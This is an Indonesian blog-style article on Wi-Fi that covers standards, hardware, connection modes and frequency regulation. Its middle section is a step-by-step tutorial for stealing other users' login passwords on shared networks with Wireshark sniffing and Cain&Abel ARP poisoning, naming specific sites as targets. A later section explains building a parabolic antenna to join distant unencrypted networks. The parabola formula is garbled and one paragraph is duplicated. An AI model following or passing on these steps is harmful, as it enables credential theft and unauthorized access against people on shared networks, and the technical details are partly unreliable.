802.11g | 54 Mb/s | 2.4 GHz | b, g | |
802.11n | 100 Mb/s | 2.4 GHz | b, g, n | |
Secara teknis operasional, Wi-Fi merupakan salah satu varian teknologi komunikasi dan informasi yang bekerja pada jaringan dan perangkat WLAN (wireless local area network). Dengan kata lain, Wi-Fi adalah sertifikasi merek dagang yang diberikan pabrikan kepada perangkat telekomunikasi (internet) yang bekerja di jaringan WLAN dan sudah memenuhi kualitas kapasitas interoperasi yang dipersyaratkan.
Teknologi internet berbasis Wi-Fi dibuat dan dikembangkan sekelompok insinyur Amerika Serikat yang bekerja pada Institute of Electrical and Electronis Engineers (IEEE) berdasarkan standar teknis perangkat bernomor 802.11b, 802.11a dan 802.16. Perangkat Wi-Fi sebenarnya tidak hanya mampu bekerja di jaringan WLAN, tetapi juga di jaringan Wireless Metropolitan Area Network (WMAN).
Karena perangkat dengan standar teknis 802.11b diperuntukkan bagi perangkat WLAN yang digunakan di frekuensi 2,4 GHz atau yang lazim disebut frekuensi ISM (Industrial, Scientific dan edical). Sedang untuk perangkat yang berstandar teknis 802.11a dan 802.16 diperuntukkan bagi perangkat WMAN atau juga disebut Wi-Max, yang bekerja di sekitar pita frekuensi 5 GHz.
Kelebihan Wi-fi
Tingginya animo masyarakat -khususnya di kalangan komunitas Internet- menggunakan teknologi Wi-Fi dikarenakan paling tidak dua faktor.
- kemudahan akses. Artinya, para pengguna dalam satu area dapat mengakses Internet secara bersamaan tanpa perlu direpotkan dengan kabel.
- pengguna yang ingin melakukan surfing atau browsing berita dan informasi di Internet, cukup membawa PDA (pocket digital assistance) atau laptop berkemampuan Wi-Fi ke tempat dimana terdapat access point atau hotspot.
Menjamurnya hotspot di tempat-tempat tersebut -yang dibangun oleh operator telekomunikasi, penyedia jasa Internet bahkan orang perorangan- dipicu faktor kedua, yakni karena biaya pembangunannya yang relatif murah atau hanya berkisar 300 dollar Amerika Serikat. Juga salah satu kelebihan dari Wi-Fi adalah kecepatannya yang beberapa kali lebih cepat dari modem kabel yang tercepat. Jadi pemakai Wi-Fi tidak lagi harus berada di dalam ruang kantor untuk bekerja
Wi-fi Hardware
Hardware wi-fi yang ada di pasaran saat ini ada berupa
Wi-fi dalam bentuk PCI Wi-fi dalam bentuk USB
Ada 2 mode akses koneksi Wi-fi, yaitu
Ad-Hoc
Mode koneksi ini adalah mode dimana beberapa komputer terhubung secara langsung, atau lebih dikenal dengan istilah Peer-to-Peer. Keuntungannya, lebih murah dan praktis bila yang terkoneksi hanya 2 atau 3 komputer, tanpa harus membeli access point
Infrastruktur
Menggunakan Access Point yang berfungsi sebagai pengatur lalu lintas data, sehingga memungkinkan banyak Client dapat saling terhubung melalui jaringan (Network).
Kelemahan pada wifi
Mudahnya dihacking oleh para hacer untuk mencuri password pengguna wi-fi
Cara adalah sebagai berikut:
Pertama kita harus mengetahui perbedaan antara jaringan Hub dan Switch:
* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.
Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.
Hacking ini menggunakan teknik:
- Sniffing
- ARP Poison Routing
Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.
Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda
Kelebihan:
- Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
- Bisa mencuri semua jenis login password yang melalui server HTTP
- Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
- Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
- Semua programnya free
- Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
- Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya
- Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:
- Komputer Korban
- Komputer Hacker
- Server
Langkah-langkah pertama:
- 1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
- 2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.Code:
Cara Menggunakan WireShark:
- Jalankan program wireshark
- Tekan tombol Ctrl+k (klik capture lalu option)
- Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
- Klik tombol start
- Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selamaanda menekan tombol start
- Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
- Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
- Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya
Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.
Cara Menggunakan Cain&Abel:
- * Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
- * Buka program Cain anda
- * Klik pada bagian configure
- * Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun. - * Setelah itu apply settingannya dan klik ok
- * Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
- * Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
- * Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana - * Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
- * Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
- * Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
- * Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
- * Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
- * Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.
Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.
Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)
Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).
Secara teknologis jalur frekuensi -baik 2,4 GHz maupun 5 GHz- yang menjadi wadah operasional teknologi Wi-Fi tidak bebas dari keterbatasan .
Pasalnya, pengguna dalam suatu area baru dapat memanfaatkan sistem Internet nirkabel ini dengan optimal, bila semua perangkat yang dipakai pada area itu menggunakan daya pancar yang seragam dan terbatas.
Apabila prasyarat tersebut tidak diindahkan, dapat dipastikan akan terjadi harmful interference bukan hanya antar perangkat pengguna Internet, tetapi juga dengan perangkat sistem telekomunikasi lainnya.
Bila interferensi tersebut berlanjut -karena penggunanya ingin lebih unggul dari pengguna lainnya, maupun karenanya kurangnya pemahaman terhadap keterbatasan teknologinya- pada akhirnya akan membuat jalur frekuensi 2,4 GHz dan 5 GHz tidak dapat dimanfaatkan secara optimal.
Keterbatasan lain dari kedua jalur frekuensi nirkabel ini (khususnya 2,4 GHz) ialah karena juga digunakan untuk keperluan ISM (industrial, science and medical).
Konsekuensinya, penggunaan komunikasi radio atau perangkat telekomunikasi lain yang bekerja pada pada pita frekuensi itu harus siap menerima gangguan dari perangkat ISM, sebagaimana tertuang dalam S5.150 dari Radio Regulation.
Dalam rekomendasi ITU-R SM.1056, diinformasikan juga karakteristik perangkat ISM yang pada intinya bertujuan mencegah timbulnya interferensi, baik antar perangkat ISM maupun dengan perangkat telekomunikasi lainnnya.
Rekomendasi yang sama menegaskan bahwa setiap anggota ITU bebas menetapkan persyaratan administrasi dan aturan hukum yang terkait dengan keharusan pembatasan daya.
Menyadari keterbatasan dan dampak yang mungkin timbul dari penggunaan kedua jalur frekuensi nirkabel tersebut, berbagai negara lalu menetapkan regulasi yang membatasi daya pancar perangkat yang digunakan.
Sinyal Wireless
Sinyal wireless LAN normalnya dapat ditangkap pada kisaran sekitar 200 meter dari access point, tetapi client yang menggunakan antena eksternal dapat menangkap sinyal sampai sejauh 1000 meter. Apabila anda menempatkan AP dekat pintu atau jendela, dapat dipastikan para tetangga dapat ikut menikmati akses Internet atau melakukan sniffing terhadap traffic network.
Apabila infrastruktur wireless LAN itu melibatkan koneksi wireless antar-gedung tinggi, maka client yang tidak diinginkan dapat melakukan sniffing dari bawah sejauh sampai 2.500 kaki (762 meter). Jadi walaupun sinyal wireless LAN para ISP yang dipasangkan di puncak-puncak gedung tinggi dapat di-sniffing dari bawah (dikenal sebagai war flying).
Jika anda ingin connect internet menggunakan wifi sementara anda jauh AP atau dari tempat wifi yang tersedia anda bisa mendekatkan diri dengan area tersebut dan bisa main internet sepuasnya dengan langkah sebagai berikut
1) Anda harus memiliki USB Wireless Adapter. Yang bisa anda dapatkan ditoko toko komputer dengan harga berkisar Rp 210.000 (cukup murah untuk technology secanggih ini) + antenna UHF bentuk parabola.
2) Langkah ini merupakan langkah kunci, yaitu dengan menggunakan antenna UHV yang berbentuk Grid Parabolic sebagai Reflector untuk memperkuat sinyal.
3) Untuk lebih memperkuat daya reflexy dari parabole anda dapat menambahkan kawat kasa pada seluruh permukaan, lalujangan lupa disekrup dengan rangka parabola. Anda juga bisa menambahkan alumunium foil.
4) Pasanglah USB WiFi Adapter pada tiang penyangga yang ada di tengah parabola. Apabila terlalu panjang dari fokusnya dapat dipotong.
Usahakan agar USB WiFI terletak pada fokus parabola. Ingat kan rumus fokus parabola. Kalau ragu nih rumus sederhananya.
F= D(kuadrat) / 4(kuadrat).c
D: diameter parabola
C: kedalaman parabola
5) pasang kabel USB( High Speed 2.0 usb cable system) sedemikian rupa.
6) Lalu pasang kembali tiang penyangga USB wifi pada parabola. Pasang pada pipa besi untuk mempermudah antenne supaya enak diputar putar.
7) Kalau udah install driver USB WiFI tadi (bawaan pabrik).
Lalu install “NETWORK STUMBLER” untuk mencari sinyal yang kuat dan terdekat.
Pasang antenna diluar dan masukkan kabel USB pada port komputer anda. Scan pake Net Stumbler. Cari jaringan yang ngga’ di ENCRYPT dan jaraknya paling deket dengan anda. Lalu join aja.
Akses ke wifi :
jenis :
secure, artinya untuk dapat mengakses kita harus memasukkan password
unsecure, artinya kita bisa mengakses wifi tanpa harus mengisikan password, jd langsung konek.
Yang unsecure, kadang juga tidak bisa mengakses internet walau bisa konek ke jaringan. Hal ini karena ada pengaturan IP. Untuk server yang menggunakan ip dinamik, maka kita tidak usah pusing dengan ip, karena ip sdh otomatis dimasukkan oleh server ke klien (computer kita).
Untuk server yang menggunakan static ip, maka kita harus secara manual memasukkan ip untuk computer/laptop kita.
Jika kita bisa konek ke wifi tp tidak bisa akses internet, cobalah ubah ip laptop kita. Caranya :
- klik kanan icon wifi di bawah kanan layar
- pilih properties
- pilih Advanced
- pada bagian connection pilih Internet Protocol (TCP/IP)
- pilih static ip
- pada ip isi : 192.168.0.212
- pada Net Mask isi : 255.255.255.0
- pada getway isi : 192.168.0.1
- pada dns server isi : 192.168.0.1
- klik ok.
Untuk pertanyaan mengenai topik ini tanyakan saja langsung ke penulis di blog dibawah ini…karna saya juga belum pernah nyoba, sy cuma mau berbagi ilmu saja,
Sumber: supralova.comli.com/tutorial/cara-mengenal-wireless-hacking-dan-segala-triknya/